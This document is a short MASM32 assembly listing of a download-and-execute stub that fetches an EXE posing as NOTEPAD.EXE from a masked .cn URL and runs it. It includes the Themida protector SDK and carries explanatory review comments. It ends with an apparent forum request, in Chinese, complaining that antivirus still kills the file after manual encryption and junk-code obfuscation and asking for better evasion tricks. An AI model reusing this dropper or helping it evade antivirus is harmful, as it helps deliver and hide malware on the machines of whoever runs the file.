.386p
.model flat,stdcall
option casemap:none
include ThemidaSDK.inc
include d:\masm32\include\windows.inc
include d:\masm32\include\user32.inc
include d:\masm32\include\kernel32.inc
include d:\masm32\include\shell32.inc
include d:\masm32\include\urlmon.inc
includelib d:\masm32\lib\user32.lib
includelib d:\masm32\lib\urlmon.lib
includelib d:\masm32\lib\shell32.lib
includelib d:\masm32\lib\kernel32.lib
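; ---------------------------------------------------------------------------
; Download-and-open stub (MASM32, 32-bit flat model, stdcall).
; Fetches the file named by UrlAddr into SaveFileAddr with URLDownloadToFile,
; then hands the saved path to ShellExecute.
;
; Security-relevant behaviour visible in this listing:
;   * The URL scheme is plain http:// and nothing here checks the downloaded
;     bytes (no hash or signature comparison) before they are opened, so what
;     runs is whatever the network path returned.
;   * The program's only behaviour is "URLDownloadToFile, then ShellExecute on
;     the saved file". This is the download-and-execute pattern, which is
;     consistent with the file being reported as malicious.
; ---------------------------------------------------------------------------
.data
UrlAddr db 'http://www.*****.cn/NOTEPAD.EXE',0        ; source URL (NUL-terminated)
SaveFileAddr db 'C:\*****\NOTEPAD.EXE',0              ; local destination path (NUL-terminated)
.code
main:
    ; eax = HRESULT; URLDownloadToFile returns S_OK (0) on success.
    invoke URLDownloadToFile,NULL,addr UrlAddr,addr SaveFileAddr,NULL,NULL
    test    eax,eax
    jnz     download_failed         ; do not open a stale or partial file left at the path
    invoke ShellExecute,0,0,addr SaveFileAddr,0,0,SW_SHOW
download_failed:
    ; NOTE(review): ExitThread ends only the calling thread; ExitProcess is the
    ; usual way to end the whole process. Confirm which is intended.
    invoke ExitThread,0
end main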
这样会被认为病毒文件被宰掉.
我用OD手工加密+花都不行,还是被宰.不知谁有高招.请指点.